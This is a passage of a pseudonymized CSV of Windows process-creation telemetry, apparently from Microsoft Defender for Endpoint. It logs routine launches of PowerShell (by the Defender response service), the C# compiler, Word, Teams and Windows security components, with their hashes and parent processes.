09:45:13.791988800+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,19536,16512,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 02:55:26.342673700+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+1127,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 09:45:18.649444400+00:00,6968,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_5ab6fbffbefffc8ef709676911fcc450657ebad0.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_5355a4f48bb0540b5c754e8df93121319d243a8c.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 09:45:18.200424400+00:00,16748,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\mtc4zlaa.cmdline""",True,2021-06-23 09:45:13.791988800+00:00,19536,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:45:18.807932500+00:00,2021-06-23 09:46:45.467113600+00:00,bf94a59d-9ee0-4a3b-8297-d42100b08053,computerpii_0a470890c60768167990033d701e7bd881398861,166590,False,10.7740.19041.1052,False,11540474045174762,,11540474045174763,2021-06-23 09:45:18.200424400+00:00,16748,2021-06-23 09:45:18.200424400+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,16748,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 03:01:19.425920800+00:00,2019-12-07 09:10:35.992536100+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+1128,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 09:45:18.960116300+00:00,20720,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\ndkkkzk1.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 09:45:13.791988800+00:00,19536,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '3a0bbacb5e49ec8cbd9055bf26cbbb0fec3f2c095bee682639e66b8c6a1acdf3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",True,2021-06-23 09:45:03.643799+00:00,11828,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:45:18.984848100+00:00,2021-06-23 09:46:45.467334900+00:00,5724c0e2-eb53-41ea-a932-7fc4a4b4f4c2,computerpii_0a470890c60768167990033d701e7bd881398861,166593,False,10.7740.19041.1052,False,11540474045174760,,11540474045174764,2021-06-23 09:45:13.791988800+00:00,19536,2021-06-23 09:45:13.791988800+00:00,powershell.exe,19536,18688,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 02:55:26.342673700+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+1129,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 09:45:19.064517800+00:00,13280,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_c83370a40575f7678907001141e361df168f9978.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_2480495ec9652ad8b34b3bbcb1553e49bae4d5bb.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 09:45:18.960116300+00:00,20720,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\ndkkkzk1.cmdline""",True,2021-06-23 09:45:13.791988800+00:00,19536,powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:45:19.152661500+00:00,2021-06-23 09:46:45.467557800+00:00,683fc124-4ce9-4aac-93f7-32a00f1ffdfe,computerpii_0a470890c60768167990033d701e7bd881398861,166596,False,10.7740.19041.1052,False,11540474045174764,,11540474045174765,2021-06-23 09:45:18.960116300+00:00,20720,2021-06-23 09:45:18.960116300+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,20720,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 09:45:18.966376600+00:00,2019-12-07 09:10:35.992536100+00:00,18688,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+1130,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:24:11.393372+00:00,4344,WINWORD.EXE,"""WINWORD.EXE"" /n ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\onboard document checklist\FilePII_e5f2ef604dbfc6708913d981862d593a88322c97.docx"" /o """"",PortableExecutable,2021-06-12 08:57:29.821251600+00:00,C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE,1966872,f3abb50ecc7e899f33f65d25e85b41a9,66cfbd07dc44da187833715ddc6e1fed4facb8b8bdaf580017f9921f1a257a60,67d3ada9611ac933b40df52acde629cf800d3bad,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:24:11.456117400+00:00,2021-06-23 01:25:31.607809900+00:00,95af8711-608f-40e3-a05d-5ece54b44d84,computerpii_0a470890c60768167990033d701e7bd881398861,158098,False,10.7740.19041.1052,False,11540474045171770,,11540474045172425,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,1025.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft Office,16.0.13801.20738,WinWord,WinWord.exe,Microsoft Word
+1131,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:24:18.334771800+00:00,15196,ShellExperienceHost.exe,"""ShellExperienceHost.exe"" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca",PortableExecutable,2020-11-11 01:19:57.076114900+00:00,C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe,1657672,7d1c00d273af86287dee68c990a49cad,6cc44fbee63233a379e08b2fdf451890f6fce8615878c44bc1a680a6f13c9cbd,0d1a489714e4693c0cdfc8fc26be32e8d648eadd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:24:18.404681400+00:00,2021-06-23 01:25:31.609365500+00:00,8f9d1cfe-04ac-48b6-b7ab-35f00d23c243,computerpii_0a470890c60768167990033d701e7bd881398861,158144,False,10.7740.19041.1052,False,11540474045136908,,11540474045172432,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,svchost.exe,504,256,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.610,ShellExperienceHost,ShellExperienceHost.exe,Windows Shell Experience Host
+1132,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 09:27:25.996178300+00:00,20820,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_Zjc5ODljOWYtYzFiYi00NzZlLWEzOWEtYjgwZDFiMWY1ZjY2%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22ca3be21a-a97f-4b69-ba2c-cd1749962d11%22%7d&launchAgent=outlook_protocol_launch""",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:27:26.113693300+00:00,2021-06-23 09:28:34.097822400+00:00,31a628a9-6f8c-48b3-83cd-bb4afe118b51,computerpii_0a470890c60768167990033d701e7bd881398861,166337,False,10.7740.19041.1052,False,11540474045171845,,11540474045174678,2021-06-23 00:51:43.564026600+00:00,16176,2021-06-23 00:51:43.564026600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16176,128,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-23 00:51:43.826220200+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1133,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 09:27:26.901678500+00:00,11240,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1712,18420048142552652691,4910079903800385159,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADgAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=1732 --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 09:27:25.996178300+00:00,20820,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_Zjc5ODljOWYtYzFiYi00NzZlLWEzOWEtYjgwZDFiMWY1ZjY2%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22ca3be21a-a97f-4b69-ba2c-cd1749962d11%22%7d&launchAgent=outlook_protocol_launch""",False,2021-06-23 00:51:43.564026600+00:00,16176,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:27:26.946836300+00:00,2021-06-23 09:28:34.097905500+00:00,b61ef92f-1eb8-4ea2-97d4-aa8554b115c6,computerpii_0a470890c60768167990033d701e7bd881398861,166338,False,10.7740.19041.1052,False,11540474045174678,,11540474045174679,2021-06-23 09:27:25.996178300+00:00,20820,2021-06-23 09:27:25.996178300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,20820,18560,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1134,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 09:27:29.698721800+00:00,10068,svchost.exe,svchost.exe -k Camera -s FrameServer,PortableExecutable,2020-10-09 20:47:23.714846100+00:00,C:\Windows\System32\svchost.exe,57360,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:27:29.851665800+00:00,2021-06-23 09:28:34.098509+00:00,324598d0-6ee3-4b38-a821-a192ba56fc8c,computerpii_0a470890c60768167990033d701e7bd881398861,166345,False,10.7740.19041.1052,False,11540474045136906,,11540474045174682,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,services.exe,988,256,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services
+1135,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 06:21:03.077225800+00:00,11496,SecHealthUI.exe,"""SecHealthUI.exe"" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca",PortableExecutable,2021-03-11 01:06:47.337101600+00:00,C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe,5215232,03a33a07964d6f6eaf43d781a4508da6,560a369c5b37bf9644da6425116341a3969bdbaffc7bf98a2b847404740a432f,a5142c9f8b7a3062341addd2661a62c8f6014cf1,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:21:03.286917500+00:00,2021-06-23 06:22:59.279915600+00:00,83402f6d-8af9-49f8-8dd8-b8a8f41dfb6a,computerpii_0a470890c60768167990033d701e7bd881398861,163850,False,10.7740.19041.1052,False,11540474045136908,,11540474045173795,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,SecHealthUI,SecHealthUI.exe,Windows Defender application
+1136,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 06:21:03.604978+00:00,14876,SecurityHealthHost.exe,SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding,PortableExecutable,2021-05-12 01:12:35.767997400+00:00,C:\Windows\System32\SecurityHealthHost.exe,98120,76a2df6d331bca4a01715c369ab81603,4a56edeb0f1b6ede1d1b292dad034757da7f481435ae12c50482086d82a78904,89fb1c4fb8f0b648acccd946798647f7b2a84aeb,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:21:04.557879100+00:00,2021-06-23 06:22:59.281190500+00:00,8552213e-086a-4077-abac-ddd77a71cb47,computerpii_0a470890c60768167990033d701e7bd881398861,163866,False,10.7740.19041.1052,False,11540474045136908,,11540474045173797,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,svchost.exe,504,256,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.1907.16384,SecurityHealthHost,SecurityHealthHost.exe,Windows Security Health Host
